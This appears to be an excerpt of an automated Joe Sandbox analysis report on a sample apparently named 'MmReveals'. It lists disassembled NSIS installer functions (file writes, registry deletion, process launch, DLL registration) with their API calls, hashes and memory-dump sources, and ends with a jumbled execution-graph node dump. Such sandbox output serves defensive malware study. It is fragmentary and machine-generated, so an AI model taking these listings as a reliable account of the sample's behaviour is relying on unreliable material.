                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                          • String ID: created uninstaller: %d, "%s"
                          • API String ID: 3294113728-3145124454
                          • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                          • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                          APIs
                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                          • String ID: RMDir: RemoveDirectory invalid input("")
                          • API String ID: 3734993849-2769509956
                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                          APIs
                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                          • GetSysColor.USER32(00000000), ref: 00403E00
                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                          • SetBkMode.GDI32(?,?), ref: 00403E18
                          • GetSysColor.USER32(?), ref: 00403E2B
                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                          • DeleteObject.GDI32(?), ref: 00403E55
                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                          Strings
                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                          • API String ID: 1033533793-945480824
                          • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                          • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                          APIs
                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                          • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                          • String ID:
                          • API String ID: 2740478559-0
                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                          APIs
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                          Strings
                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                          • Exec: success ("%s"), xrefs: 00402263
                          • Exec: command="%s", xrefs: 00402241
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                          • API String ID: 2014279497-3433828417
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                          • GetMessagePos.USER32 ref: 00404871
                          • ScreenToClient.USER32(?,?), ref: 00404889
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                          • MulDiv.KERNEL32(0000F200,00000064,?), ref: 00403295
                          • wsprintfW.USER32 ref: 004032A5
                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                          Strings
                          • verifying installer: %d%%, xrefs: 0040329F
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: verifying installer: %d%%
                          • API String ID: 1451636040-82062127
                          APIs
                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                          • wsprintfW.USER32 ref: 00404457
                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s$@rD
                          • API String ID: 3540041739-1813061909
                          APIs
                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: *?|<>/":
                          • API String ID: 589700163-165019052
                          APIs
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                          Similarity
                          • API ID: Close$DeleteEnumOpen
                          • String ID:
                          • API String ID: 1912718029-0
                          APIs
                          • GetDlgItem.USER32(?), ref: 004020A3
                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                          • DeleteObject.GDI32(00000000), ref: 004020EE
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          APIs
                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          APIs
                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          Strings
                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                          Similarity
                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                          • API String ID: 1697273262-1764544995
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00404902
                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID: $@rD
                          • API String ID: 3748168415-881980237
                          APIs
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                          • lstrlenW.KERNEL32 ref: 004026B4
                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                          Similarity
                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                          • String ID: CopyFiles "%s"->"%s"
                          • API String ID: 2577523808-3778932970
                          Similarity
                          • API ID: lstrcatwsprintf
                          • String ID: %02x%c$...
                          • API String ID: 3065427908-1057055748
                          APIs
                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                          Similarity
                          • API ID: PrivateProfileStringWritelstrcpyn
                          • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                          • API String ID: 247603264-1827671502
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 00405057
                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          Similarity
                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                          • String ID: Section: "%s"$Skipping section: "%s"
                          • API String ID: 2266616436-4211696005
                          APIs
                          • GetDC.USER32(?), ref: 00402100
                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                          • String ID:
                          • API String ID: 1599320355-0
                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                          APIs
                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                          Strings
                          Similarity
                          • API ID: lstrcpyn$CreateFilelstrcmp
                          • String ID: Version
                          • API String ID: 512980652-315105994
                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                          APIs
                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                          • GetTickCount.KERNEL32 ref: 00403303
                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                          Similarity
                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                          • String ID:
                          • API String ID: 2102729457-0
                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                          Similarity
                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                          • String ID:
                          • API String ID: 2883127279-0
                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                          APIs
                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                          Strings
                          Similarity
                          • API ID: Window$EnableShowlstrlenwvsprintf
                          • String ID: HideWindow
                          • API String ID: 1249568736-780306582
                          • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                          • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                          APIs
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                          Strings
                          Similarity
                          • API ID: PrivateProfileStringlstrcmp
                          • String ID: !N~
                          • API String ID: 623250636-529124213
                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                          APIs
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                          • CloseHandle.KERNEL32(?), ref: 00405C71
                          Strings
                          • Error launching installer, xrefs: 00405C48
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: Error launching installer
                          • API String ID: 3712363035-66219284
                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                          APIs
                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                          Strings
                          Similarity
                          • API ID: CloseHandlelstrlenwvsprintf
                          • String ID: RMDir: RemoveDirectory invalid input("")
                          • API String ID: 3509786178-2769509956
                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                          APIs
                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                          Execution Graph

                          Execution Coverage: 4.3%
                          Dynamic/Decrypted Code Coverage: 0%
                          Signature Coverage: 2.6%
                          Total number of Nodes: 2000
                          Total number of Limit Nodes: 200
101068->101069 101070 521a36 59 API calls 101069->101070 101071 53002d 101070->101071 101072 5301af 60 API calls 101071->101072 101073 530037 Mailbox 101072->101073 101073->100826 101075 521a45 __NMSG_WRITE _memmove 101074->101075 101076 530f16 Mailbox 59 API calls 101075->101076 101077 521a83 101076->101077 101097 530f1e 101094->101097 101096 530f38 101096->100850 101097->101096 101099 530f3c std::exception::exception 101097->101099 101104 53586c 101097->101104 101121 533503 DecodePointer 101097->101121 101122 5386fb RaiseException 101099->101122 101101 530f66 101123 538631 58 API calls _free 101101->101123 101103 530f78 101103->100850 101105 5358e7 101104->101105 101109 535878 101104->101109 101129 533503 DecodePointer 101105->101129 101107 5358ed 101130 538c88 58 API calls __getptd_noexit 101107->101130 101108 535883 101108->101109 101116 533201 __mtinitlocknum 3 API calls 101108->101116 101124 53a2cb 58 API calls __NMSG_WRITE 101108->101124 101125 53a328 58 API calls 5 library calls 101108->101125 101109->101108 101112 5358ab RtlAllocateHeap 101109->101112 101115 5358d3 101109->101115 101119 5358d1 101109->101119 101126 533503 DecodePointer 